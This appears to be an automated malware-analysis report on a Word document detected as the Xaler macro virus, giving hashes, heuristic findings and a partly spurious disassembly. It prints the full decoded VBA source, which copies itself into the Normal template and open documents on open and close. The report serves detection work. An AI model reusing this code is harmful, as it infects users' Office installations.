Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 829414696f6307ee…

MALICIOUS

Office (OLE)

7.85 MB Created: 2019-03-20 07:08:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 8dde049e5b8181d8660c16fe492fd712 SHA-1: a46db26e7a1f033abc02fd12ce35adc6f9354985 SHA-256: 829414696f6307ee64f918cb6c09be06ae09d21c23210d3510d609aa78bf2773
250 Risk Score

Heuristics 6

  • ClamAV: Doc.Trojan.Xaler-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Xaler-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • x86 GetPC stub (CALL $+5; POP EAX) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EAX)
    Disassembly
    x86 disassembly · validity: uncertain (0.626) — 3/4 branch targets land on an instruction boundary (75% coherence)
    00020940  e800000000        call 0x20945
    00020945  58                pop eax
    00020946  00ec              add ah, ch
    00020948  94                xchg esp, eax
    00020949  96                xchg esi, eax
    0002094A  0594800000        add eax, 0x8094
    0002094F  0080000038f5      add byte ptr [eax - 0xac80000], al
    00020955  e5d8              in eax, 0xd8
    00020957  8a20              mov ah, byte ptr [eax]
    00020959  0000              add byte ptr [eax], al
    0002095B  04a2              add al, 0xa2
    0002095D  03967bf23209      add edx, dword ptr [esi + 0x932f27b]
    00020963  350e7e7f47        xor eax, 0x477f7e0e
    00020968  131e              adc ebx, dword ptr [esi]
    0002096A  8f                .byte 0x8f
    0002096B  353d3d3955        xor eax, 0x55393d3d
    00020970  f5                cmc
    00020971  72d6              jb 0x20949
    00020973  93                xchg ebx, eax
    00020974  8cd4              mov esp, ss
    00020976  55                push ebp
    00020977  84d2              test dl, dl
    00020979  52                push edx
    0002097A  81650028000000    and dword ptr [ebp], 0x28
    00020981  1495              adc al, 0x95
    00020983  05940004a2        add eax, 0xa2040094
    00020988  50                push eax
    00020989  4b                dec ebx
    0002098A  0a08              or cl, byte ptr [eax]
    0002098C  a228802c00        mov byte ptr [0x2c8028], al
    00020991  0000              add byte ptr [eax], al
    00020993  0001              add byte ptr [ecx], al
    00020995  2c0a              sub al, 0xa
    00020997  58                pop eax
    00020998  0020              add byte ptr [eax], ah
    0002099A  00809a752eef      add byte ptr [eax - 0x10d18a66], al
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2436 bytes
SHA-256: 8dfe3ac4c94ec3baad1b0f27171afcde1b53bd199e24689cc99b72cb413f5d2d
Detection
ClamAV: Doc.Trojan.Xaler-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'RELAX
Private Sub RELAX2()
End
End Sub

Private Sub ComboBox1_Change()

End Sub

Private Sub Document_Close()
Call GOODSub
Call RELAX2
End Sub

Private Sub GOODSub()
On Error Resume Next
Application.ScreenUpdating = False
Application.Options.SaveNormalPrompt = False
x$ = "C:\temp.tmp"
MacroContainer.VBProject.vbcomponents.Item("ThisDocument").Export x$
Open x$ For Input As #1
keimeno = Input(LOF(1), 1)
Close #1
kk& = InStr(1, keimeno, "'RELAX")
keimeno = Right$(keimeno, Len(keimeno) - kk& + 1)
For j = 1 To 2
If j = 1 Then
NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").Export x$
Else
ActiveDocument.VBProject.vbcomponents.Item("ThisDocument").Export x$
End If
Open x$ For Input As #1
rlx = Input(LOF(1), 1)
Close #1
d1 = InStr(1, rlx, "'RELAX")
If d1 = 0 Then
If j = 1 Then
NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
NormalTemplate.Save
Else
ActiveDocument.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
End If
End If
Next j
'====================
Dim PRostasia As Byte
PRostasia = 1
fff = FreeFile
If Dir(ActiveDocument.FullName, 6) <> "" Then
Open ActiveDocument.FullName For Binary As #fff
Put #fff, 862, PRostasia
Close #fff
ActiveDocument.Save
End If
Kill x$
Application.ScreenUpdating = True
End Sub

Private Sub Document_Open()
Call GOODSub
End Sub